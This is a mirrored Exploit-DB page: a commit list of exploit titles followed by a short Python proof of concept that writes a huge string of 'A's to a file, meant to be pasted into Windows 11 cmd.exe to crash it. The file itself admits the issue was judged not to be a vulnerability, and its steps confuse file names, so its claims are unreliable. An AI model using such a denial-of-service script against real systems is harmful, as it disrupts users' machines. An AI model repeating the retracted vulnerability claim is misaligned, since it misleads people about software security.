bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/51348.txt
Exploit-DB 85954a8fad DB: 2023-04-09 
34 changes to exploits/shellcodes/ghdb

ENTAB ERP 1.0 - Username PII leak

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

FortiRecorder 6.4.3 - Denial of Service

Schneider Electric v1.0 - Directory traversal & Broken Authentication

Altenergy Power Control Software C1.2.5 - OS command injection

Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)

Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

Google Chrome  109.0.5414.74 - Code Execution via missing lib file (Ubuntu)

Lucee Scheduled Job v1.0 -  Command Execution

Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)

Adobe Connect 11.4.5 - Local File Disclosure

Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)

Suprema BioStar 2 v2.8.16 - SQL Injection

Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)

dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)

GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure

Icinga Web 2.10 - Arbitrary File Disclosure

Joomla! v4.2.8 - Unauthenticated information disclosure

Medicine Tracker System v1.0 - Sql Injection

Online Appointment System V1.0 - Cross-Site Scripting (XSS)

Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)

pfsenseCE v2.6.0 - Anti-brute force protection bypass

Restaurant Management System 1.0  - SQL Injection

WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)

Microsoft Windows 11 - 'cmd.exe' Denial of Service

ActFax 10.10 - Unquoted Path Services

ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path

RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution

Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
2023-04-09 00:16:30 +00:00

38 lines
No EOL
1.3 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Date: 2023-03-30
# Vendor Homepage: https://www.microsoft.com/en-us
# Software Link: https://www.microsoft.com/en-us
# Tested Version: N/A
# Tested on OS: Windows 11 Pro
# [ About App ]
Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
This issue affects Microsoft Windows 11 Pro.
Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
# [ POC ]
# 1.Run the python script, it will create a new file "PoC.txt"
# 2.Run Command Prompt
# 3.Copy the content of the file "PoC.txt"
# 4.Paste the content of dos.txt into the lin cmd.exe
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "A" * 339839907
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Reference in a new issue View git blame Copy permalink